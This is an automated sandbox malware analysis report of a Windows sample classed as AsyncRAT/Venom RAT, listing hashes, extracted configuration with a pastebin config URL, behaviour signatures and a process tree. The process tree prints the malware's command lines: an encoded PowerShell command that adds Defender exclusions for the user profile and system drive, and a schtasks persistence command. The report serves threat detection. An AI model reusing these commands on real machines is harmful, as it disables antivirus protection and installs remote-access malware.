Analysis
-
max time kernel
60s -
max time network
60s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/03/2025, 00:49
Static task
static1
Behavioral task
behavioral1
Sample
ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe
Resource
win10v2004-20250314-en
General
-
Target
ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe
-
Size
30.1MB
-
MD5
5fb9e419d4ae63f3483630e314aedf4b
-
SHA1
fd0e4f4c9faacf239154bffc4ab9df2a36d5a38a
-
SHA256
ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72
-
SHA512
50dd2aaf40a63c2604b74a303402344d5d34e8191790099a23dd842baa98fca108c414352e167485b2ee333a184eb17667d0ae9036920c8b1f49104c6f627f4b
-
SSDEEP
786432:CGHzzuqE2+z5m4K+I6yybsorCII/v9ZH4+gX/AxWMX84j5NF:CGHzm2+zvKb6yybHrCJDzSAxZF
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
EulenV4
chxtzuezuve
-
delay
1
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/KnhCGRrn
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0009000000017492-19.dat family_asyncrat -
Executes dropped EXE 5 IoCs
pid Process 2348 runtime.exe 2116 svchost.exe 2960 loader.exe 1428 loader.exe 2720 svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 2960 loader.exe 1428 loader.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 pastebin.com 4 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1712 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1036 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 2940 powershell.exe 2116 svchost.exe 2116 svchost.exe 2116 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe 2720 svchost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2116 svchost.exe Token: SeDebugPrivilege 2116 svchost.exe Token: SeDebugPrivilege 2720 svchost.exe Token: SeDebugPrivilege 2720 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2720 svchost.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 1936 wrote to memory of 2940 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 30 PID 1936 wrote to memory of 2940 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 30 PID 1936 wrote to memory of 2940 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 30 PID 1936 wrote to memory of 2940 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 30 PID 1936 wrote to memory of 2348 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 31 PID 1936 wrote to memory of 2348 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 31 PID 1936 wrote to memory of 2348 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 31 PID 1936 wrote to memory of 2348 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 31 PID 1936 wrote to memory of 2116 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 33 PID 1936 wrote to memory of 2116 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 33 PID 1936 wrote to memory of 2116 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 33 PID 1936 wrote to memory of 2116 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 33 PID 1936 wrote to memory of 2960 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 34 PID 1936 wrote to memory of 2960 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 34 PID 1936 wrote to memory of 2960 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 34 PID 1936 wrote to memory of 2960 1936 ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe 34 PID 2348 wrote to memory of 2840 2348 runtime.exe 35 PID 2348 wrote to memory of 2840 2348 runtime.exe 35 PID 2348 wrote to memory of 2840 2348 runtime.exe 35 PID 2960 wrote to memory of 1428 2960 loader.exe 36 PID 2960 wrote to memory of 1428 2960 loader.exe 36 PID 2960 wrote to memory of 1428 2960 loader.exe 36 PID 2116 wrote to memory of 1780 2116 svchost.exe 37 PID 2116 wrote to memory of 1780 2116 svchost.exe 37 PID 2116 wrote to memory of 1780 2116 svchost.exe 37 PID 2116 wrote to memory of 2448 2116 svchost.exe 39 PID 2116 wrote to memory of 2448 2116 svchost.exe 39 PID 2116 wrote to memory of 2448 2116 svchost.exe 39 PID 1780 wrote to memory of 1036 1780 cmd.exe 41 PID 1780 wrote to memory of 1036 1780 cmd.exe 41 PID 1780 wrote to memory of 1036 1780 cmd.exe 41 PID 2448 wrote to memory of 1712 2448 cmd.exe 42 PID 2448 wrote to memory of 1712 2448 cmd.exe 42 PID 2448 wrote to memory of 1712 2448 cmd.exe 42 PID 2448 wrote to memory of 2720 2448 cmd.exe 43 PID 2448 wrote to memory of 2720 2448 cmd.exe 43 PID 2448 wrote to memory of 2720 2448 cmd.exe 43 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe"C:\Users\Admin\AppData\Local\Temp\ad091aff1603773230aa3ec020c30c96bf53e36baaf128c5056bc06d8254ca72.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAaABuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAdwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAZwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQBwACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\runtime.exe"C:\Users\Admin\AppData\Local\Temp\runtime.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2348 -s 5283⤵PID:2840
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:1036
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpBA69.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1712
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\onefile_2960_133875965690114000\loader.exeC:\Users\Admin\AppData\Local\Temp\loader.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1428
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
12.0MB
MD5d40e357c84cda7eb31419a69ae038d97
SHA1853d03a0cfe3aa0f21d16b2da378e4554c71a088
SHA25645215606ecea7c6d2624d05ee6b0703beb9d0abdf42566c77ccb89576338b8c6
SHA51282a67c7be3fef7d4deb4d1c1e85d392fdfb16e830f9574868c8bcc42aa3eb8a3435b0d3d0786a1015af8f8b41f66074a1825a24eb559e42b164aca71ee3dca2f
-
Filesize
5.5MB
MD59a24c8c35e4ac4b1597124c1dcbebe0f
SHA1f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA5129d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b
-
Filesize
74KB
MD585f89a5f5806117cc82aec6e1f89cd13
SHA1735d2331d6bc90498f3f1405af0dffa37b136e5d
SHA256adbce5e454bbc8b27c4ac87f70dee8d622395b541736d6f0af027dd94e454cb7
SHA512038c96c575f0a1204a4159cd7ac9262f7e1447be9bba28278ddcdd6294280f40399cfb06a89e40460114306c9b5a33d466ac2de7af58575b80cad0921f4a979d
-
Filesize
151B
MD551f2b7087967746a176734e4231ea70f
SHA1a8deba94ec8967cd41a688ef9696847575a5332d
SHA25626180a392c452121660d05a1129e884aba39286abce44cf1047c0945aaccce4b
SHA512921bc997bfe7d209960bd01c7bf3cc57036b2830bc0af7d3e194cfaf460a632cf1c8974a09db5fd3aaff4f75b3007cfe5eb56353002ca0c2b2003cdf51ea5dd5
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
Filesize
20.7MB
MD54ed0d5143664ce4d6a25072f1c465616
SHA1e560ecd9fe3a6754d72493d9e0e796e3837be5df
SHA256ac9bb0231e3e3e4305a2cf44708dbf7e0e6cfa286faac9bc687c364a4070e398
SHA512d763f44d7a5bff11a3a75c7b4182362ad63d33618402480aa3c993b1ed8f21dfda0e70cf25e71e33ffac5f9ca541fa0a3c96c53abb510fc36a5917373528f466
-
Filesize
58KB
MD51ab99ff9dfb2017db1a59403f5ca1c2b
SHA14e43875075d8dd21755aa8dd91365d561be43594
SHA256bd9f8e352f172f3a5ad106388d1fd67ed09f419f1d100bd89e7980e25d273526
SHA51244bb3c86caa4b2c0c63251d602f03aa5a38d099ece58462dc78d38740981733b731711250b34db2a93c8b2a1fab7e707e29ee010b24129d762daed226d72ca4a